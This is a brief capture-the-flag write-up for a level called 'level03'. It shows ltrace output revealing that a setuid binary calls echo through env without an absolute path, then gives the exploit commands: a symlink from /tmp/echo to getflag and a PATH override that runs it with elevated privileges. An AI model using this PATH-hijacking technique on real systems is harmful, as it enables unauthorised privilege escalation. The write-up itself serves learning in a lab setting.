This level introduces linux binary analyzers
Also, it's highly recommend to get fimiliar with setgid, setuid and sticky bit
First, looking at the level03 library-function traces.
ltrace ./level03Result:
...
system("/usr/bin/env echo Exploit me")
...As the setuid bit is present, binary will be executed with the flag03 privileges.
We see that echo is not called with the absolute path.
Also, the enviroment obtained from the env call.
These lead us to the idea, that we can exploit it using binary substitution.
# 1. Creating symbolic link to getflag from echo
ln -s /bin/getflag /tmp/echo
# 2. Calling executable replacing the path where the executable file will be searched
PATH=/tmp ./level03